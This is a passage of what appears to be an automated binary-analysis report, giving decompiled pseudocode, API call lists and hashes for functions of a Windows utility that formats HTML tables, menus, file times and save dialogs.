                                                                                                    • Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                    • Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
                                                                                                    • Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                    • Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                    • Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                  • _wcsicmp.MSVCRT ref: 004059FA
                                                                                                  • wcschr.MSVCRT ref: 00405A0E
                                                                                                  • _wcsicmp.MSVCRT ref: 00405A20
                                                                                                  • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                  • OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                  • CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
                                                                                                  • String ID:
                                                                                                  • API String ID: 768606695-0
                                                                                                  • Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                  • Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
                                                                                                  • Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                  • Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 64%
                                                                                                  			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                  				signed int _v8;
                                                                                                  				intOrPtr _v12;
                                                                                                  				signed int _v16;
                                                                                                  				signed int _v20;
                                                                                                  				signed int _v24;
                                                                                                  				signed int _v28;
                                                                                                  				void _v68;
                                                                                                  				char _v108;
                                                                                                  				void _v160;
                                                                                                  				void* __esi;
                                                                                                  				signed int _t55;
                                                                                                  				void* _t57;
                                                                                                  				wchar_t* _t67;
                                                                                                  				intOrPtr* _t73;
                                                                                                  				signed int _t74;
                                                                                                  				signed int _t86;
                                                                                                  				signed int _t95;
                                                                                                  				intOrPtr* _t98;
                                                                                                  				void* _t100;
                                                                                                  				void* _t102;
                                                                                                  
                                                                                                  				_t73 = __ebx;
                                                                                                  				_t74 = 0xd;
                                                                                                  				_push(9);
                                                                                                  				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
                                                                                                  				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
                                                                                                  				_t102 = _t100 + 0x18;
                                                                                                  				asm("movsw");
                                                                                                  				E00407343(__ebx, _a4, L"<tr>");
                                                                                                  				_t95 = 0;
                                                                                                  				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
                                                                                                  					do {
                                                                                                  						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
                                                                                                  						_v8 = _t55;
                                                                                                  						_t57 =  &_v160;
                                                                                                  						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
                                                                                                  							_t57 =  &_v68;
                                                                                                  						}
                                                                                                  						_t98 = _a8;
                                                                                                  						_v28 = _v28 | 0xffffffff;
                                                                                                  						_v24 = _v24 | 0xffffffff;
                                                                                                  						_v20 = _v20 | 0xffffffff;
                                                                                                  						_v16 = _v16 & 0x00000000;
                                                                                                  						_v12 = _t57;
                                                                                                  						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
                                                                                                  						E0040ADC0(_v28,  &_v108);
                                                                                                  						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
                                                                                                  						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
                                                                                                  						_t67 =  *(_t73 + 0x64);
                                                                                                  						_t86 =  *_t67 & 0x0000ffff;
                                                                                                  						if(_t86 == 0 || _t86 == 0x20) {
                                                                                                  							wcscat(_t67, L"&nbsp;");
                                                                                                  						}
                                                                                                  						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
                                                                                                  						_push( *((intOrPtr*)(_t73 + 0x68)));
                                                                                                  						_push( &_v108);
                                                                                                  						_push(_v12);
                                                                                                  						_push(0x2000);
                                                                                                  						_push( *((intOrPtr*)(_t73 + 0x60)));
                                                                                                  						L0040B1EC();
                                                                                                  						_t102 = _t102 + 0x1c;
                                                                                                  						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
                                                                                                  						_t95 = _t95 + 1;
                                                                                                  					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
                                                                                                  				}
                                                                                                  				return E00407343(_t73, _a4, L"\r\n");
                                                                                                  			}























                                                                                                  0x00407639
                                                                                                  0x00407646
                                                                                                  0x00407647
                                                                                                  0x00407654
                                                                                                  0x0040765f
                                                                                                  0x0040765f
                                                                                                  0x0040766b
                                                                                                  0x0040766d
                                                                                                  0x00407672
                                                                                                  0x00407677
                                                                                                  0x0040767d
                                                                                                  0x00407680
                                                                                                  0x00407686
                                                                                                  0x00407691
                                                                                                  0x00407697
                                                                                                  0x00407699
                                                                                                  0x00407699
                                                                                                  0x0040769c
                                                                                                  0x0040769f
                                                                                                  0x004076a3
                                                                                                  0x004076a7
                                                                                                  0x004076ab
                                                                                                  0x004076b5
                                                                                                  0x004076be
                                                                                                  0x004076c8
                                                                                                  0x004076de
                                                                                                  0x004076ee
                                                                                                  0x004076f1
                                                                                                  0x004076f4
                                                                                                  0x004076fa
                                                                                                  0x00407708
                                                                                                  0x0040770e
                                                                                                  0x00407718
                                                                                                  0x0040771d
                                                                                                  0x00407723
                                                                                                  0x00407724
                                                                                                  0x00407727
                                                                                                  0x0040772c
                                                                                                  0x0040772f
                                                                                                  0x00407734
                                                                                                  0x0040773f
                                                                                                  0x00407744
                                                                                                  0x00407745
                                                                                                  0x0040767d
                                                                                                  0x00407760

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: _snwprintfwcscat
                                                                                                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                  • API String ID: 384018552-4153097237
                                                                                                  • Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                  • Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
                                                                                                  • Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                  • Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 42%
                                                                                                  			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
                                                                                                  				struct tagMENUITEMINFOW _v0;
                                                                                                  				int _t24;
                                                                                                  				wchar_t* _t30;
                                                                                                  				intOrPtr _t32;
                                                                                                  				int _t34;
                                                                                                  				int _t42;
                                                                                                  				signed int _t47;
                                                                                                  				signed int _t48;
                                                                                                  
                                                                                                  				_t36 = __ecx;
                                                                                                  				_t48 = _t47 & 0xfffffff8;
                                                                                                  				E0040B550(0x203c, __ecx);
                                                                                                  				_t24 = GetMenuItemCount(_a8);
                                                                                                  				_t34 = _t24;
                                                                                                  				_t42 = 0;
                                                                                                  				if(_t34 <= 0) {
                                                                                                  					L13:
                                                                                                  					return _t24;
                                                                                                  				} else {
                                                                                                  					goto L1;
                                                                                                  				}
                                                                                                  				do {
                                                                                                  					L1:
                                                                                                  					memset( &_a50, 0, 0x2000);
                                                                                                  					_t48 = _t48 + 0xc;
                                                                                                  					_a36 =  &_a48;
                                                                                                  					_v0.cbSize = 0x30;
                                                                                                  					_a4 = 0x36;
                                                                                                  					_a40 = 0x1000;
                                                                                                  					_a16 = 0;
                                                                                                  					_a48 = 0;
                                                                                                  					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
                                                                                                  					if(_t24 == 0) {
                                                                                                  						goto L12;
                                                                                                  					}
                                                                                                  					if(_a48 == 0) {
                                                                                                  						L10:
                                                                                                  						_t56 = _a20;
                                                                                                  						if(_a20 != 0) {
                                                                                                  							_push(0);
                                                                                                  							_push(_a20);
                                                                                                  							_push(_a4);
                                                                                                  							_t24 = E0040605E(_t36, _t56);
                                                                                                  							_t48 = _t48 + 0xc;
                                                                                                  						}
                                                                                                  						goto L12;
                                                                                                  					}
                                                                                                  					_t30 = wcschr( &_a48, 9);
                                                                                                  					if(_t30 != 0) {
                                                                                                  						 *_t30 = 0;
                                                                                                  					}
                                                                                                  					_t31 = _a16;
                                                                                                  					if(_a20 != 0) {
                                                                                                  						if(_a12 == 0) {
                                                                                                  							 *0x40fe20 =  *0x40fe20 + 1;
                                                                                                  							_t32 =  *0x40fe20; // 0x0
                                                                                                  							_t31 = _t32 + 0x11558;
                                                                                                  							__eflags = _t32 + 0x11558;
                                                                                                  						} else {
                                                                                                  							_t17 = _t42 + 0x11171; // 0x11171
                                                                                                  							_t31 = _t17;
                                                                                                  						}
                                                                                                  					}
                                                                                                  					_t24 = E00406025(_t31,  &_a48);
                                                                                                  					_pop(_t36);
                                                                                                  					goto L10;
                                                                                                  					L12:
                                                                                                  					_t42 = _t42 + 1;
                                                                                                  				} while (_t42 < _t34);
                                                                                                  				goto L13;
                                                                                                  			}











                                                                                                  0x0040605e
                                                                                                  0x00406061
                                                                                                  0x00406069
                                                                                                  0x00406074
                                                                                                  0x0040607a
                                                                                                  0x0040607e
                                                                                                  0x00406082
                                                                                                  0x00406148
                                                                                                  0x0040614e
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00406088
                                                                                                  0x00406088
                                                                                                  0x00406093
                                                                                                  0x00406098
                                                                                                  0x0040609f
                                                                                                  0x004060ae
                                                                                                  0x004060b6
                                                                                                  0x004060be
                                                                                                  0x004060c6
                                                                                                  0x004060ca
                                                                                                  0x004060cf
                                                                                                  0x004060d7
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004060de
                                                                                                  0x00406129
                                                                                                  0x00406129
                                                                                                  0x0040612d
                                                                                                  0x0040612f
                                                                                                  0x00406130
                                                                                                  0x00406134
                                                                                                  0x00406137
                                                                                                  0x0040613c
                                                                                                  0x0040613c
                                                                                                  0x00000000
                                                                                                  0x0040612d
                                                                                                  0x004060e7
                                                                                                  0x004060f0
                                                                                                  0x004060f2
                                                                                                  0x004060f2
                                                                                                  0x004060f9
                                                                                                  0x004060fd
                                                                                                  0x00406102
                                                                                                  0x0040610c
                                                                                                  0x00406112
                                                                                                  0x00406117
                                                                                                  0x00406117
                                                                                                  0x00406104
                                                                                                  0x00406104
                                                                                                  0x00406104
                                                                                                  0x00406104
                                                                                                  0x00406102
                                                                                                  0x00406122
                                                                                                  0x00406128
                                                                                                  0x00000000
                                                                                                  0x0040613f
                                                                                                  0x0040613f
                                                                                                  0x00406140
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                  • String ID: 0$6
                                                                                                  • API String ID: 2029023288-3849865405
                                                                                                  • Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                  • Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
                                                                                                  • Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                  • Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 82%
                                                                                                  			E00402BEE(void* __ebx) {
                                                                                                  				int _v8;
                                                                                                  				int _v12;
                                                                                                  				intOrPtr _v16;
                                                                                                  				intOrPtr _v20;
                                                                                                  				int _v24;
                                                                                                  				int _v28;
                                                                                                  				void* _t27;
                                                                                                  				int _t31;
                                                                                                  				void* _t34;
                                                                                                  				int _t37;
                                                                                                  				int _t38;
                                                                                                  				int _t41;
                                                                                                  				int _t50;
                                                                                                  
                                                                                                  				_t34 = __ebx;
                                                                                                  				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
                                                                                                  					return _t27;
                                                                                                  				} else {
                                                                                                  					asm("movsd");
                                                                                                  					asm("movsd");
                                                                                                  					asm("movsd");
                                                                                                  					asm("movsd");
                                                                                                  					_v8 = GetSystemMetrics(0x4e);
                                                                                                  					_v12 = GetSystemMetrics(0x4f);
                                                                                                  					_t41 = GetSystemMetrics(0x4c);
                                                                                                  					_t31 = GetSystemMetrics(0x4d);
                                                                                                  					if(_v8 == 0 || _v12 == 0) {
                                                                                                  						_v8 = GetSystemMetrics(0);
                                                                                                  						_v12 = GetSystemMetrics(1);
                                                                                                  						_t41 = 0;
                                                                                                  						_t31 = 0;
                                                                                                  					} else {
                                                                                                  						_v8 = _v8 + _t41;
                                                                                                  						_v12 = _v12 + _t31;
                                                                                                  					}
                                                                                                  					_t50 = _v20 - _v28;
                                                                                                  					if(_t50 > 0x14) {
                                                                                                  						_t38 = _v24;
                                                                                                  						_t37 = _v16 - _t38;
                                                                                                  						if(_t37 > 0x14 && _v20 > _t41 + 5) {
                                                                                                  							_t31 = _t31 + 0xfffffff6;
                                                                                                  							if(_t38 >= _t31) {
                                                                                                  								_t31 = _v28;
                                                                                                  								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
                                                                                                  									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
                                                                                                  								}
                                                                                                  							}
                                                                                                  						}
                                                                                                  					}
                                                                                                  					return _t31;
                                                                                                  				}
                                                                                                  			}
















                                                                                                  0x00402bee
                                                                                                  0x00402bf8
                                                                                                  0x00402cae
                                                                                                  0x00402c08
                                                                                                  0x00402c10
                                                                                                  0x00402c11
                                                                                                  0x00402c12
                                                                                                  0x00402c13
                                                                                                  0x00402c20
                                                                                                  0x00402c27
                                                                                                  0x00402c2e
                                                                                                  0x00402c30
                                                                                                  0x00402c37
                                                                                                  0x00402c4b
                                                                                                  0x00402c50
                                                                                                  0x00402c53
                                                                                                  0x00402c55
                                                                                                  0x00402c3e
                                                                                                  0x00402c3e
                                                                                                  0x00402c41
                                                                                                  0x00402c41
                                                                                                  0x00402c5a
                                                                                                  0x00402c60
                                                                                                  0x00402c65
                                                                                                  0x00402c68
                                                                                                  0x00402c6d
                                                                                                  0x00402c77
                                                                                                  0x00402c7c
                                                                                                  0x00402c7e
                                                                                                  0x00402c87
                                                                                                  0x00402ca5
                                                                                                  0x00402ca5
                                                                                                  0x00402c87
                                                                                                  0x00402c7c
                                                                                                  0x00402c6d
                                                                                                  0x00000000
                                                                                                  0x00402cac

                                                                                                  APIs
                                                                                                  • GetSystemMetrics.USER32 ref: 00402C1C
                                                                                                  • GetSystemMetrics.USER32 ref: 00402C23
                                                                                                  • GetSystemMetrics.USER32 ref: 00402C2A
                                                                                                  • GetSystemMetrics.USER32 ref: 00402C30
                                                                                                  • GetSystemMetrics.USER32 ref: 00402C47
                                                                                                  • GetSystemMetrics.USER32 ref: 00402C4E
                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: MetricsSystem$Window
                                                                                                  • String ID:
                                                                                                  • API String ID: 1155976603-0
                                                                                                  • Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                  • Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
                                                                                                  • Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                  • Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004036D5(void* __edi, void* __eflags) {
                                                                                                  				intOrPtr _v8;
                                                                                                  				char _v12;
                                                                                                  				intOrPtr _v16;
                                                                                                  				intOrPtr _v20;
                                                                                                  				char* _v24;
                                                                                                  				char _v28;
                                                                                                  				char* _v48;
                                                                                                  				intOrPtr _v56;
                                                                                                  				intOrPtr _v60;
                                                                                                  				int _v64;
                                                                                                  				int _v72;
                                                                                                  				intOrPtr _v76;
                                                                                                  				wchar_t* _v80;
                                                                                                  				intOrPtr _v84;
                                                                                                  				int _v92;
                                                                                                  				char* _v96;
                                                                                                  				intOrPtr _v104;
                                                                                                  				struct tagOFNA _v108;
                                                                                                  				void _v634;
                                                                                                  				long _v636;
                                                                                                  				void _v2682;
                                                                                                  				char _v2684;
                                                                                                  				void* __ebx;
                                                                                                  				char _t37;
                                                                                                  				intOrPtr _t38;
                                                                                                  				int _t46;
                                                                                                  				signed short _t54;
                                                                                                  
                                                                                                  				_v636 = 0;
                                                                                                  				memset( &_v634, 0, 0x208);
                                                                                                  				_v2684 = 0;
                                                                                                  				memset( &_v2682, 0, 0x7fe);
                                                                                                  				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
                                                                                                  				_v12 = _t37;
                                                                                                  				_t38 =  *0x40cbf0; // 0x67
                                                                                                  				_v8 = _t38;
                                                                                                  				_v28 = E00405B81(0x227);
                                                                                                  				_v24 = L"*.cfg";
                                                                                                  				_v20 = E00405B81(0x228);
                                                                                                  				_v16 = L"*.*";
                                                                                                  				E00405236( &_v2684,  &_v28);
                                                                                                  				_t54 = 0xa;
                                                                                                  				_v60 = E00405B81(_t54);
                                                                                                  				_v104 =  *((intOrPtr*)(__edi + 0x10));
                                                                                                  				_v48 =  &_v12;
                                                                                                  				_v96 =  &_v2684;
                                                                                                  				_v108 = 0x4c;
                                                                                                  				_v92 = 0;
                                                                                                  				_v84 = 1;
                                                                                                  				_v80 =  &_v636;
                                                                                                  				_v76 = 0x104;
                                                                                                  				_v72 = 0;
                                                                                                  				_v64 = 0;
                                                                                                  				_v56 = 0x80806;
                                                                                                  				_t46 = GetSaveFileNameW( &_v108);
                                                                                                  				if(_t46 != 0) {
                                                                                                  					wcscpy( &_v636, _v80);
                                                                                                  					return E0040365E(__edi, 1,  &_v636);
                                                                                                  				}
                                                                                                  				return _t46;
                                                                                                  			}






























                                                                                                  0x004036ef
                                                                                                  0x004036f6
                                                                                                  0x0040370b
                                                                                                  0x00403712
                                                                                                  0x00403717
                                                                                                  0x0040371c
                                                                                                  0x0040371f
                                                                                                  0x0040372c
                                                                                                  0x00403735
                                                                                                  0x00403738
                                                                                                  0x00403744
                                                                                                  0x00403751
                                                                                                  0x00403758
                                                                                                  0x00403760
                                                                                                  0x00403769
                                                                                                  0x0040376c
                                                                                                  0x00403778
                                                                                                  0x0040377b
                                                                                                  0x0040378b
                                                                                                  0x00403792
                                                                                                  0x00403795
                                                                                                  0x00403798
                                                                                                  0x0040379b
                                                                                                  0x004037a2
                                                                                                  0x004037a5
                                                                                                  0x004037a8
                                                                                                  0x004037af
                                                                                                  0x004037b7
                                                                                                  0x004037c3
                                                                                                  0x00000000
                                                                                                  0x004037d4
                                                                                                  0x004037dc

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 004036F6
                                                                                                  • memset.MSVCRT ref: 00403712
                                                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                    • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                    • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                    • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                    • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                    • Part of subcall function 00405236: memset.MSVCRT ref: 00405257
                                                                                                    • Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
                                                                                                    • Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
                                                                                                    • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
                                                                                                    • Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
                                                                                                    • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA
                                                                                                  • GetSaveFileNameW.COMDLG32(?), ref: 004037AF
                                                                                                  • wcscpy.MSVCRT ref: 004037C3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
                                                                                                  • String ID: L$cfg
                                                                                                  • API String ID: 275899518-3734058911
                                                                                                  • Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                  • Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
                                                                                                  • Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                  • Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
                                                                                                  				struct _SYSTEMTIME _v20;
                                                                                                  				long _v276;
                                                                                                  				long _v532;
                                                                                                  				FILETIME* _t15;
                                                                                                  
                                                                                                  				_t15 = __eax;
                                                                                                  				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
                                                                                                  					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
                                                                                                  						goto L5;
                                                                                                  					} else {
                                                                                                  						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
                                                                                                  						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
                                                                                                  						wcscpy(_a4,  &_v276);
                                                                                                  						wcscat(_a4, " ");
                                                                                                  						wcscat(_a4,  &_v532);
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					L5:
                                                                                                  					wcscpy(_a4, 0x40c4e8);
                                                                                                  				}
                                                                                                  				return _a4;
                                                                                                  			}







                                                                                                  0x00404ed0
                                                                                                  0x00404edf
                                                                                                  0x00404ef6
                                                                                                  0x00000000
                                                                                                  0x00404f00
                                                                                                  0x00404f1c
                                                                                                  0x00404f31
                                                                                                  0x00404f41
                                                                                                  0x00404f4e
                                                                                                  0x00404f5d
                                                                                                  0x00404f66
                                                                                                  0x00404f69
                                                                                                  0x00404f69
                                                                                                  0x00404f71
                                                                                                  0x00404f77
                                                                                                  0x00404f7d

                                                                                                  APIs
                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
                                                                                                  • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
                                                                                                  • wcscpy.MSVCRT ref: 00404F41
                                                                                                  • wcscat.MSVCRT ref: 00404F4E
                                                                                                  • wcscat.MSVCRT ref: 00404F5D
                                                                                                  • wcscpy.MSVCRT ref: 00404F71
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                  • String ID:
                                                                                                  • API String ID: 1331804452-0
                                                                                                  • Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                  • Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
                                                                                                  • Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                  • Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 71%
                                                                                                  			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
                                                                                                  				void _v514;
                                                                                                  				long _v516;
                                                                                                  				wchar_t* _t34;
                                                                                                  				signed int _t35;
                                                                                                  				void* _t36;
                                                                                                  				void* _t37;
                                                                                                  
                                                                                                  				_t34 = __edi;
                                                                                                  				_v516 = _v516 & 0x00000000;
                                                                                                  				memset( &_v514, 0, 0x1fc);
                                                                                                  				 *__edi =  *__edi & 0x00000000;
                                                                                                  				_t37 = _t36 + 0xc;
                                                                                                  				_t35 = 0;
                                                                                                  				do {
                                                                                                  					_push( *(_t35 + _a4) & 0x000000ff);
                                                                                                  					_push(L"%2.2X");
                                                                                                  					_push(0xff);
                                                                                                  					_push( &_v516);
                                                                                                  					L0040B1EC();
                                                                                                  					_t37 = _t37 + 0x10;
                                                                                                  					if(_t35 > 0) {
                                                                                                  						wcscat(_t34, " ");
                                                                                                  					}
                                                                                                  					if(_a8 > 0) {
                                                                                                  						asm("cdq");
                                                                                                  						if(_t35 % _a8 == 0) {
